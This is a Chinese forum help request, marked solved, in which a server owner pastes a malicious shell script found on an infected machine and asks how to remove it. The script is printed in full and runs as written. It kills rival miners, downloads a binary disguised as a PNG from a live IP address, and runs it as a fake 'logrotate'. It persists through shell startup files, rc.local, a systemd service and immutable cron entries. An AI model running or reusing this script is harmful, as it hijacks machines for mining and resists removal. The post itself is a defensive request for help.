【已解决】服务器中病毒了,哪位安全方面的大神来给看看,急!急!急!
【已解决】
看来这个病毒刚被发现不就,有遇到同样问题的同学请在评论区留言,我告诉你怎么解决O(∩_∩)O
=================
这是一段病毒脚本,哪位大神给解读下,要怎么清理掉它呢?
现在是文件删不掉,进程杀不掉
#!/bin/sh { pkill -f xmrig || kill -9 $(pgrep -f 'xmrig'); } >/dev/null 2>&1 ps -eo pid,%cpu,comm --sort=-%cpu | awk 'NR>1 && !/awk|ps/ && !($3 ~ /^(logrotate|sshd|java)$/) && int($2) > 60 { system("kill -9 " $1) }' EXEC="source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)" trap 'rm -- "$0"' EXIT if [ -z "${HOME+x}" ]; then export HOME=/tmp fi mkdir -p "$HOME/.config" >/dev/null 2>&1 [ ! -f "$HOME/.config/logrotate" ] && { ARCH=$(uname -m) URL="" [ "$ARCH" = "x86_64" ] && URL="http://185.196.8.123/silicon64blueprints.png" [ "$ARCH" = "aarch64" ] && URL="http://185.196.8.123/siliconarmblueprints.png" [ -z "$URL" ] && URL="http://185.196.8.123/silicon64blueprints.png" { wget -q -O "$HOME/.config/logrotate" "$URL" || curl -sL -o "$HOME/.config/logrotate" "$URL"; } >/dev/null 2>&1 chmod +x "$HOME/.config/logrotate" >/dev/null 2>&1 } pgrep -f "config/logrotate" >/dev/null 2>&1 || "$HOME/.config/logrotate" add_to_startup() { if [ -r "$1" ]; then if ! grep -Fxq "$EXEC >/dev/null 2>&1" "$1"; then echo "$EXEC >/dev/null 2>&1" >> "$1" fi fi } case "$(ps -p $$ -o comm=)" in bash) add_to_startup "$HOME/.bashrc" add_to_startup "$HOME/.bash_logout" ;; zsh) add_to_startup "$HOME/.zshrc" ;; esac [ "$(id -u)" -eq 0 ] && { RCLOCAL='' [ -e /etc/debian_version ] && RCLOCAL='/etc/rc.local' [ -e /etc/centos-release -o -e /etc/redhat-release ] && RCLOCAL='/etc/rc.d/rc.local' [ -n "$RCLOCAL" ] && add_to_startup "$RCLOCAL" cat >/etc/systemd/system/logrotate.service <<EOL [Unit] Description=The logrotate utility is designed to simplify the administration of log files on a system which generates a lot of log files [Service] ExecStart=$HOME/.config/logrotate Restart=always Nice=-20 StandardOutput=null [Install] WantedBy=multi-user.target EOL sudo systemctl daemon-reload 2>/dev/null sudo systemctl enable logrotate.service 2>/dev/null [ -d /var/spool/cron ] && [ -f /var/spool/cron/root ] && echo "@daily $EXEC" >> /var/spool/cron/root 2>/dev/null [ -d /var/spool/cron/crontabs ] && [ -f /var/spool/cron/crontabs/root ] && echo "@daily $EXEC" >> /var/spool/cron/crontabs/root 2>/dev/null [ -f /etc/crontab ] && echo "@daily $EXEC" >> /etc/crontab 2>/dev/null && sudo chattr +i /etc/crontab 2>/dev/null [ -d /etc/cron.hourly ] && echo "$EXEC" >> /etc/cron.hourly/logrotate 2>/dev/null && sudo chmod +x /etc/cron.hourly/logrotate 2>/dev/null && sudo chattr +i /etc/cron.hourly/logrotate 2>/dev/null [ -d /etc/cron.daily ] && echo "$EXEC" >> /etc/cron.daily/logrotate 2>/dev/null && sudo chmod +x /etc/cron.daily/logrotate 2>/dev/null && sudo chattr +i /etc/cron.daily/logrotate 2>/dev/null [ -d /etc/cron.weekly ] && echo "$EXEC" >> /etc/cron.weekly/logrotate 2>/dev/null && sudo chmod +x /etc/cron.weekly/logrotate 2>/dev/null && sudo chattr +i /etc/cron.weekly/logrotate 2>/dev/null [ -d /etc/cron.monthly ] && echo "$EXEC" >> /etc/cron.monthly/logrotate 2>/dev/null && sudo chmod +x /etc/cron.monthly/logrotate 2>/dev/null && sudo chattr +i /etc/cron.monthly/logrotate 2>/dev/null [ -d /etc/cron.yearly ] && echo "$EXEC" >> /etc/cron.yearly/logrotate 2>/dev/null && sudo chmod +x /etc/cron.yearly/logrotate 2>/dev/null && sudo chattr +i /etc/cron.yearly/logrotate 2>/dev/null }
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构